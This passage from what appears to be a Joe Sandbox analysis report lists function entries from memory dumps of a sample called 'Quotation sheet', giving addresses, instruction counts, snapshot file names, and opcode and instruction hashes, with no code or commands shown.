                                                                                                                        • Opcode Fuzzy Hash: b50a94434ceab638d97fdeed47298653e8d5da884b652cc0865b2b522aea8699
                                                                                                                        • Instruction Fuzzy Hash: C5213579D152449BDB14EFB498607AD7BB1FF81320F14459BE51497241CB348E05CB61
                                                                                                                        Function 094DC6B8 Relevance: .1, Instructions: 83COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9fa7052883c42c7c8c9838f99aee4e786db95bd4eb5c7dd1b3d400b0c72d7aed
                                                                                                                        • Instruction ID: dfe690bf5cac93f9bfaa794399754687aa79e4f4083d001e35be6c3094186f05
                                                                                                                        • Opcode Fuzzy Hash: 9fa7052883c42c7c8c9838f99aee4e786db95bd4eb5c7dd1b3d400b0c72d7aed
                                                                                                                        • Instruction Fuzzy Hash: 01312A74E06258CFDB18CFAAC8946AEBBF6BF89301F10912AD449A7355DB345D06CB90
                                                                                                                        Function 094D0DE4 Relevance: .1, Instructions: 82COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 895554c6f1cacf267fc3cab68a1835db180f37a8c74343043df0e3a24f165e6b
                                                                                                                        • Instruction ID: 75336a0ac6dcbe069efc62e6153f0322110a35472c7ad6a74e5ad4a6597b151b
                                                                                                                        • Opcode Fuzzy Hash: 895554c6f1cacf267fc3cab68a1835db180f37a8c74343043df0e3a24f165e6b
                                                                                                                        • Instruction Fuzzy Hash: A6210038F0A205C7CB197F74C4641AABBB0EF4A340F50456BD84667254FB32D952CBE1
                                                                                                                        Function 094DC6C8 Relevance: .1, Instructions: 80COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7b5516120a37d80a5493b486b8e0008033fd683ec5ce03e998b38a829a88600e
                                                                                                                        • Instruction ID: fd346682192e21f5a3e395fd742634576a6e0d9cc6ddfcea5ea160ed85410887
                                                                                                                        • Opcode Fuzzy Hash: 7b5516120a37d80a5493b486b8e0008033fd683ec5ce03e998b38a829a88600e
                                                                                                                        • Instruction Fuzzy Hash: ED31F674E06218CBDB18CFAAC8946AEBBF6FB89301F10912AD449A7355DB345D02CB90
                                                                                                                        Function 094D53B0 Relevance: .1, Instructions: 76COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b401bf2113c236a751698f32a172f9a1e6db22fcb67500263231dd2a8656d3da
                                                                                                                        • Instruction ID: ef9620f9548ecaf08e37ecdc62c2ed8cce19649896d922c9183565f892f577b3
                                                                                                                        • Opcode Fuzzy Hash: b401bf2113c236a751698f32a172f9a1e6db22fcb67500263231dd2a8656d3da
                                                                                                                        • Instruction Fuzzy Hash: 1E218E35E006198FCB11EFA8C4546AEB7F0FF88350F00816AE919E7210EF709A45CB92
                                                                                                                        Function 0173D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2336953708.000000000173D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0173D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_173d000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8bb329c8ff40cb4bcb01ecca6f12ff0c9a1bb4d79e39d127425999e41bc36232
                                                                                                                        • Instruction ID: efe27d9899ee53b2dc7b9f9a56b7e9d82e3566a8ea21025902013c787add929f
                                                                                                                        • Opcode Fuzzy Hash: 8bb329c8ff40cb4bcb01ecca6f12ff0c9a1bb4d79e39d127425999e41bc36232
                                                                                                                        • Instruction Fuzzy Hash: C221E2B6504204DFDB25DF94D9C0B66FB65FBC4324F6081A9DD090A257C336E456CAA1
                                                                                                                        Function 0173D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2336953708.000000000173D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0173D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_173d000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 609b2e9e30a70f511d6ca44efd6c4377d7bfa65650e706c9f9940fc94497c1cd
                                                                                                                        • Instruction ID: c504158dbbf208c2c205f5779d9734c596aa1cf8291ee149812a9767eb28b230
                                                                                                                        • Opcode Fuzzy Hash: 609b2e9e30a70f511d6ca44efd6c4377d7bfa65650e706c9f9940fc94497c1cd
                                                                                                                        • Instruction Fuzzy Hash: A021F1B2504240EFDB25DF54D9C0B26FF66FBC8318F7085A9E9090A297C336D456CAA1
                                                                                                                        Function 094D4B31 Relevance: .1, Instructions: 73COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d89d92c907a9d38e9f92a0a70f2003edad858301d186fdb76af092fa95e4ab47
                                                                                                                        • Instruction ID: a7fee12c6534ec8a7e0f0f3bf1859642e69c92f4b748ae192515541ec2ce4e4d
                                                                                                                        • Opcode Fuzzy Hash: d89d92c907a9d38e9f92a0a70f2003edad858301d186fdb76af092fa95e4ab47
                                                                                                                        • Instruction Fuzzy Hash: 69212336F016168BDB20EEA9C8913AFB7B1EBD5310F04C52FE519A3350DB78994187D0
                                                                                                                        Function 0174D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2337021809.000000000174D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_174d000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c673d7af8d760e4927bc23ae6e36e825d61463c093a199912845aab02b1bfbe4
                                                                                                                        • Instruction ID: 6f9095cfddacb7794e3ecf0d69a94b409818bbab5bd5f3b8ac598a3c7e123883
                                                                                                                        • Opcode Fuzzy Hash: c673d7af8d760e4927bc23ae6e36e825d61463c093a199912845aab02b1bfbe4
                                                                                                                        • Instruction Fuzzy Hash: 14214971608300EFDB25DF94D5C0B25FBA1FB94324F20C6ADE9894B352C376D406CA61
                                                                                                                        Function 0174D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2337021809.000000000174D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_174d000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7f0b99f667ea8e991303b14289119b2b53cd9108522b337455fa715d3c3bcd14
                                                                                                                        • Instruction ID: da0bf47ffa911e01c7947fccdef67a0396d012f8aab1071403e769a05aff8d12
                                                                                                                        • Opcode Fuzzy Hash: 7f0b99f667ea8e991303b14289119b2b53cd9108522b337455fa715d3c3bcd14
                                                                                                                        • Instruction Fuzzy Hash: 63212275604204EFDB25DF94D9C4B26FB61FB98314F20C5ADD98A0B262C37AD407CA61
                                                                                                                        Function 094D4950 Relevance: .1, Instructions: 71COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2ac294986c7bfe6205074b83632f1dba7c3b228eca04dad5c6f15ff4b2301cf2
                                                                                                                        • Instruction ID: ec4b2e5b856d8bf852b43bca79a9749dcd60e3d78ef8b0690518ade3cd8a5689
                                                                                                                        • Opcode Fuzzy Hash: 2ac294986c7bfe6205074b83632f1dba7c3b228eca04dad5c6f15ff4b2301cf2
                                                                                                                        • Instruction Fuzzy Hash: BE212175B102099FCF04EF69D8959AEBBB5FF88300B108569E905E7355EB30AD45CBA0
                                                                                                                        Function 094D4960 Relevance: .1, Instructions: 71COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ccb3e4b0cb4c00832609262a00543289d63e7f2db9d74a9442a372a0cedaf899
                                                                                                                        • Instruction ID: 7979ca9c6efd34cade3c846d0d34d669e8e4216e06080deb993dcd11d3eb3bb4
                                                                                                                        • Opcode Fuzzy Hash: ccb3e4b0cb4c00832609262a00543289d63e7f2db9d74a9442a372a0cedaf899
                                                                                                                        • Instruction Fuzzy Hash: AD211575B102098FCF04DF69C8949AEF7B5FF893007108569E905B7355EB70AD45CBA1
                                                                                                                        Function 094D1F1C Relevance: .1, Instructions: 66COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8ff003dd386f735c6fc14cb8e5afd96167d5a880525badb39d1e9d893c5704e5
                                                                                                                        • Instruction ID: c3926ac7fbd407b9469ada3bab2843355b9f0a6a0348d5abb1edb5690502b9c3
                                                                                                                        • Opcode Fuzzy Hash: 8ff003dd386f735c6fc14cb8e5afd96167d5a880525badb39d1e9d893c5704e5
                                                                                                                        • Instruction Fuzzy Hash: 9C2103B5D013099FDB10CF9AD884A9EFBF4FB48314F10842EE519A7300D7B5A904CBA4
                                                                                                                        Function 094D2658 Relevance: .1, Instructions: 66COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 495847d961278d4175e13bf19cbb8a5707ce588d8707dab677478a67e0a4da8e
                                                                                                                        • Instruction ID: 1ec967d83fd336aec8bc47c07af3312dc0f2ad57d1be851b9774224165ef9779
                                                                                                                        • Opcode Fuzzy Hash: 495847d961278d4175e13bf19cbb8a5707ce588d8707dab677478a67e0a4da8e
                                                                                                                        • Instruction Fuzzy Hash: FF21F2B59013099FDB10CF9AD984A9EFBF4FB48314F14846EE818A7300D7B5A904CBA4
                                                                                                                        Function 094D0DD4 Relevance: .1, Instructions: 65COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 95f975b9e7407389f65506b34e1eb2475f0c02aac4eb9a81fd07822508a7283b
                                                                                                                        • Instruction ID: 7a4072a477cc1e276982dd42576ebc8ba220aeabfa827cab8dda4b406030398d
                                                                                                                        • Opcode Fuzzy Hash: 95f975b9e7407389f65506b34e1eb2475f0c02aac4eb9a81fd07822508a7283b
                                                                                                                        • Instruction Fuzzy Hash: 6911E375F0A106EBCB156E95D9542EEBFB0EB44340B694CA7D889B3280F23186358B94
                                                                                                                        Function 094D0CD8 Relevance: .1, Instructions: 58COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ac0df63aeb5ebcdee29aeb92866064294dc57a129a5c0aefe330aacd0511c80d
                                                                                                                        • Instruction ID: 461781d076986e8ebc28be10fbfd58d644eb94dfaf4ba0032964bc2bfc87ed6d
                                                                                                                        • Opcode Fuzzy Hash: ac0df63aeb5ebcdee29aeb92866064294dc57a129a5c0aefe330aacd0511c80d
                                                                                                                        • Instruction Fuzzy Hash: 3A114975B106058FCB14DF69D4859AAFBF5FF88310B20816AE909D7321EB31E9028B91
                                                                                                                        Function 0173D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2336953708.000000000173D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0173D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_173d000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                        • Instruction ID: be7b093cc5fb61c15357f0f5d49ae80e6765a86b4a17bfe4cd0f785ebea7adb3
                                                                                                                        • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                        • Instruction Fuzzy Hash: 6B119D76504280CFCB16CF54D5C4B16BF62FB84218F2486A9D8490B657C33AD556CBA1
                                                                                                                        Function 0173D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2336953708.000000000173D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0173D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_173d000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                        • Instruction ID: 08430fa876a6d7fff283275d2033413f2c37401edc4508e051983a297683eb9b
                                                                                                                        • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                        • Instruction Fuzzy Hash: 8311CDB6404280CFCB12CF54D5C0B56BF62FB84224F2482A9DC090A257C33AE456CBA1
                                                                                                                        Function 094DD5E4 Relevance: .1, Instructions: 56COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bd7d40aa418dc16489b423d9e477a3e1747bbc5b0e424151f7c2857d1d80e1ce
                                                                                                                        • Instruction ID: beff4953c441819d16570222f8c0fe42cdf37d1e19217b31329487a1f86b0f61
                                                                                                                        • Opcode Fuzzy Hash: bd7d40aa418dc16489b423d9e477a3e1747bbc5b0e424151f7c2857d1d80e1ce
                                                                                                                        • Instruction Fuzzy Hash: 0C2103B5C00349DFCB10CF9AC884ADEBBF4FB48720F10841AE919A7250D375A954CFA1
                                                                                                                        Function 094D0C37 Relevance: .1, Instructions: 55COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 31a1c9603dc3ab576e2eaceb359ddbb120a4b76a2198ca2ae570549a4dfa3398
                                                                                                                        • Instruction ID: ac46bc1c135bcf28e811b5318708e12f75d9abf622353190331ea6321f8c9d97
                                                                                                                        • Opcode Fuzzy Hash: 31a1c9603dc3ab576e2eaceb359ddbb120a4b76a2198ca2ae570549a4dfa3398
                                                                                                                        • Instruction Fuzzy Hash: 700128363026008BDB29AA18D4B87AF77D9EFC4B14F15812AE5498B358CF71DC41C7A5
                                                                                                                        Function 094D0CE8 Relevance: .1, Instructions: 54COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4dfef9cd855cfac954530ef136b4ee0e2d580dfc702e376fce01978844b834c7
                                                                                                                        • Instruction ID: d0fef5626e0cf40c9cb86337d97223610f9e07c7bfbbad91351e7378e7fb1322
                                                                                                                        • Opcode Fuzzy Hash: 4dfef9cd855cfac954530ef136b4ee0e2d580dfc702e376fce01978844b834c7
                                                                                                                        • Instruction Fuzzy Hash: 0B111C75B106159FCB14DF69D4849AAFBF5FF8D210B20816AE909D7321EB31ED02CBA0
                                                                                                                        Function 094DD511 Relevance: .1, Instructions: 54COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3ec8408aad51db6c9c4f7b36b567604bd8500325c38f482694280fa51dd5da0c
                                                                                                                        • Instruction ID: aa2fa7d855551cfe76b050bf0b3b6127766011f51509853c490eda3086e2c601
                                                                                                                        • Opcode Fuzzy Hash: 3ec8408aad51db6c9c4f7b36b567604bd8500325c38f482694280fa51dd5da0c
                                                                                                                        • Instruction Fuzzy Hash: 2311A178D0A208EFCB60DFA4D8607AE7BF9EB49304F009556D40993B81DB316E01CB90
                                                                                                                        Function 094D0C48 Relevance: .1, Instructions: 53COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7593567c91f497ff17ad27e8f9470e2e2d9d724e2acecc5c74cda3a9007d59f5
                                                                                                                        • Instruction ID: 90b8220ad8af181bf1b9e5320c1d9937880e8ba7385aa4eb443b7c9a2b0ead1c
                                                                                                                        • Opcode Fuzzy Hash: 7593567c91f497ff17ad27e8f9470e2e2d9d724e2acecc5c74cda3a9007d59f5
                                                                                                                        • Instruction Fuzzy Hash: 3C01B5353026004BDB296A28D478B7F73DADBC4B14F15412AE5498B354CEB1DC41C7A5
                                                                                                                        Function 094DC72B Relevance: .1, Instructions: 53COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4f9ac1c3bf15b7589177a93c19cc1fe1d60cbf0a68c97317393ade1bb9e809d2
                                                                                                                        • Instruction ID: 32e46c78ec847255002a682d7f1144f07779b309e89972776f0ad2cb84a5caec
                                                                                                                        • Opcode Fuzzy Hash: 4f9ac1c3bf15b7589177a93c19cc1fe1d60cbf0a68c97317393ade1bb9e809d2
                                                                                                                        • Instruction Fuzzy Hash: DB11F378E0A218CFCB04CFA9D4949EEB7F6FB89301F10512AE849A7345DB345D02CB50
                                                                                                                        Function 0174D017 Relevance: .1, Instructions: 53COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2337021809.000000000174D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_174d000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                        • Instruction ID: 7d3c335310694a2994bf4feadc6bb415bc54cd4276fda4435175ed2a68db4224
                                                                                                                        • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                        • Instruction Fuzzy Hash: 3F11DD75504284CFCB26CF54D5C4B15FFA2FB88314F24C6AED8494B666C33AD40ACBA2
                                                                                                                        Function 0174D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2337021809.000000000174D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_174d000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                        • Instruction ID: 3ed323c32543c75088457332136cac1e979e8053fad47c96dcf6806e29abd1e9
                                                                                                                        • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                        • Instruction Fuzzy Hash: EE11BB75508280DFCB12CF54C5C4B15FBA1FB84224F24C6A9D8894B2A6C33AD40ACB61
                                                                                                                        Function 094D4A21 Relevance: .1, Instructions: 52COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: efe9b0c4c90b5d817fd360d0d6291ad2075776799a511f44258f48df60b22db9
                                                                                                                        • Instruction ID: e619b9ec8ce35c9c18a84cea2e163de62e96bce9941650f7bfd9de13b1cc6512
                                                                                                                        • Opcode Fuzzy Hash: efe9b0c4c90b5d817fd360d0d6291ad2075776799a511f44258f48df60b22db9
                                                                                                                        • Instruction Fuzzy Hash: 410192343011118FD7049B6DC859B6A37EAEF8D710F1980BAEA09CB3B8CE74DC0197A0
                                                                                                                        Function 094DEFBB Relevance: .1, Instructions: 51COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0b3429483763ff05c34247ffd90a016a75c8a0cf7c8bf2d993d3b6066e6916dc
                                                                                                                        • Instruction ID: 1cec7c6f8b4779fe41c558c13debf6cce5a36484f6d851c7a0ebb5a1b43c2791
                                                                                                                        • Opcode Fuzzy Hash: 0b3429483763ff05c34247ffd90a016a75c8a0cf7c8bf2d993d3b6066e6916dc
                                                                                                                        • Instruction Fuzzy Hash: D8118E3990A208EFC710DFA5D82579EBFF8EB49300F1085AAE408DB351DB319E05CB91
                                                                                                                        Function 094D2D67 Relevance: .0, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9165adc0b8ed1a6dd18240bb33018d79a4908c79f21a16d00849afab2fc4779f
                                                                                                                        • Instruction ID: 138da3c00ccc30452c625a71d6e686b4794b9d20dffde370057839f8939a59cd
                                                                                                                        • Opcode Fuzzy Hash: 9165adc0b8ed1a6dd18240bb33018d79a4908c79f21a16d00849afab2fc4779f
                                                                                                                        • Instruction Fuzzy Hash: 0A11CE30E002099FDB00EFA8DC517EEBBB5EF08304F10452AD825E7350DB759601CB90
                                                                                                                        Function 094D1630 Relevance: .0, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
